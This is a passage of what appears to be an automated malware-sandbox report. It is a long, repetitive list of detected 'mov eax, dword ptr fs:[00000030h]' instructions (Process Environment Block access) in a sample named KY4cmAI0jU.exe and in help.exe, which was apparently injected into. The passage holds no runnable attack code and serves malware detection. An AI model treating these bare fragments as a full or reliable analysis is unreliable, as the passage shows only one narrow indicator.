          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]1_2_00B98CD6
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]1_2_00AFBC2C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]1_2_00AE746D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFAC7B mov eax, dword ptr fs:[00000030h]1_2_00AFAC7B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]1_2_00AEB477
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]1_2_00AFA44B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]1_2_00B5C450
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]1_2_00B5C450
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]1_2_00AF35A1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]1_2_00B905AC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]1_2_00B905AC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]1_2_00AFFD9B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]1_2_00AFFD9B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]1_2_00B82D82
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]1_2_00B78DF1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ADD5E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ADD5E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]1_2_00B8E539
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]1_2_00B4A537
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]1_2_00B98D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]1_2_00ACAD30
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]1_2_00AEC577
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]1_2_00AEC577
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]1_2_00B03D43
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]1_2_00B43540
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B73D40 mov eax, dword ptr fs:[00000030h]1_2_00B73D40
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]1_2_00AE7D50
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]1_2_00B446A7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]1_2_00B5FE87
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AF16E0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]1_2_00AD76E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]1_2_00AF36CC
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]1_2_00B98ED6
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B7FEC0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]1_2_00B08EC7
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]1_2_00B7FE3F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]1_2_00ACE620
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]1_2_00AF8E00
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]1_2_00B81608
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]1_2_00AFA61C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]1_2_00AFA61C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]1_2_00AD766D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]1_2_00B8AE44
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]1_2_00B8AE44
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]1_2_00AD8794
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]1_2_00B037F5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]1_2_00AC4F2E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]1_2_00AC4F2E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]1_2_00AEB73D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]1_2_00AEB73D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]1_2_00AFE730
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]1_2_00AFA70E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]1_2_00AFA70E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]1_2_00B5FF10
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]1_2_00B5FF10
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]1_2_00B9070D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]1_2_00B9070D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]1_2_00AEF716
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]1_2_00ADFF60
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]1_2_00B98F6A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]1_2_00ADEF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]6_2_02FB4AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22AE4 mov eax, dword ptr fs:[00000030h]6_2_02F22AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F22ACB mov eax, dword ptr fs:[00000030h]6_2_02F22ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]6_2_02F0AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]6_2_02F0AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]6_2_02F2FAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]6_2_02EF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]6_2_02EF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]6_2_02EF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]6_2_02EF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]6_2_02EF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2D294 mov eax, dword ptr fs:[00000030h]6_2_02F2D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F2D294 mov eax, dword ptr fs:[00000030h]6_2_02F2D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02F3927A mov eax, dword ptr fs:[00000030h]6_2_02F3927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAB260 mov eax, dword ptr fs:[00000030h]6_2_02FAB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FAB260 mov eax, dword ptr fs:[00000030h]6_2_02FAB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FC8A62 mov eax, dword ptr fs:[00000030h]6_2_02FC8A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FBEA55 mov eax, dword ptr fs:[00000030h]6_2_02FBEA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]6_2_02EF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]6_2_02EF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]6_2_02EF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]6_2_02EF9240
